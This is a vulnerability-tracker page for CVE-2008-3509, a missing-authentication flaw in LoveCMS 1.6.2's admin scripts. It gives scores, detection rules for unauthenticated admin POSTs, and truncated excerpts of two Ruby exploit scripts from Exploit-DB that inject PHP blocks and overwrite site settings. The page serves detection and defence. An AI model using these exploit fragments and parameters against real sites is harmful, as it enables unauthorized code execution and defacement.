CVE-2008-3509
published 2008-08-07CVE-2008-3509: LoveCMS 1.6.2 does not require administrative authentication for (1) addblock.php, (2) blocks.php, and (3) themes.php in system/admin/, which allows remote…
PriorityP353high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.43%
87.4th percentile
LoveCMS 1.6.2 does not require administrative authentication for (1) addblock.php, (2) blocks.php, and (3) themes.php in system/admin/, which allows remote attackers to change the configuration or execute arbitrary PHP code via addition of blocks, and other vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lovecms | lovecms | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated POST requests to system/admin/addblock.php with parameters 'type=php' and a 'content' field — this is the primary RCE vector allowing arbitrary PHP code injection via block addition. ↗
- →Detect unauthenticated POST requests to system/admin/blocks.php with bulk 'position', 'height', and 'visible' parameters (iterated numerically), used to make injected PHP blocks visible on the site. ↗
- →Detect unauthenticated POST requests to system/admin/themes.php — this endpoint allows configuration changes (sitename, footer, debugmode, console, etc.) without authentication. ↗
- →Flag any HTTP request to the three admin endpoints (addblock.php, blocks.php, themes.php) that lacks a valid session/authentication cookie, as the vulnerability is specifically the absence of authentication checks. ↗
- ·The exploit targets LoveCMS version 1.6.2 Final specifically; other versions may not be vulnerable or may have different admin path structures. ↗
- ·The RCE payload in the exploit uses phpinfo() as a proof-of-concept; real-world attackers would substitute arbitrary PHP code in the 'content' POST parameter — detection rules should match on type=php broadly, not just phpinfo(). ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
LoveCMS 1.6.2 Final - Remote Code Execution
exploitdb·2008-08-06
CVE-2008-3509 LoveCMS 1.6.2 Final - Remote Code Execution
LoveCMS 1.6.2 Final - Remote Code Execution
---
#!/usr/bin/ruby
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 1: adding a side block
##
## Description: add some php into a block container
## on the side of the site. phpinfo() is called.
##
## Usage: ./LoveCMS_1_blocks.rb
## Ex: ./LoveCMS_1_blocks.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
#
require 'net/http'
require 'uri'
@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'
@host = ARGV[0] if ARGV[0]
@host += @host[-1, 1].to_s != '/' ? '/' : ''
if @host
# --
puts " + LoveCMS Exploit Series. #1: Adding side blocks."
puts
puts " : Attacking host: " + @host
# --
# Insert a new block
res = Net::HTTP.post_form(URI.parse(
Exploit-DB
LoveCMS 1.6.2 Final - Update Settings
exploitdb·2008-08-06
CVE-2008-3509 LoveCMS 1.6.2 Final - Update Settings
LoveCMS 1.6.2 Final - Update Settings
---
#!/usr/bin/ruby
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 3: changing site settings ...
##
## Description: Simply change the site settings !
##
## Usage: ./LoveCMS_3_settings.rb
## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
#
require 'net/http'
require 'uri'
@host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/'
@post_vars = {}
@post_vars['submit'] = 1
@post_vars['pagetitle'] = 'P4g3T1t1le'
@post_vars['sitename'] = 'SiteN4me'
@post_vars['slogan'] = 'By PoMdaPiMp.'
@post_vars['footer'] = 'PoMdaPiMp was here.'
@post_vars['description'] = 'Ruby is a gift.'
@post_vars['keywords'] = 'PoMdaPiMp, hack'
@post_va
No writeups or analysis indexed.
http://secunia.com/advisories/31389http://www.securityfocus.com/bid/30562https://exchange.xforce.ibmcloud.com/vulnerabilities/44226https://exchange.xforce.ibmcloud.com/vulnerabilities/44227https://www.exploit-db.com/exploits/6209https://www.exploit-db.com/exploits/6210http://secunia.com/advisories/31389http://www.securityfocus.com/bid/30562https://exchange.xforce.ibmcloud.com/vulnerabilities/44226https://exchange.xforce.ibmcloud.com/vulnerabilities/44227https://www.exploit-db.com/exploits/6209https://www.exploit-db.com/exploits/6210
2008-08-07
Published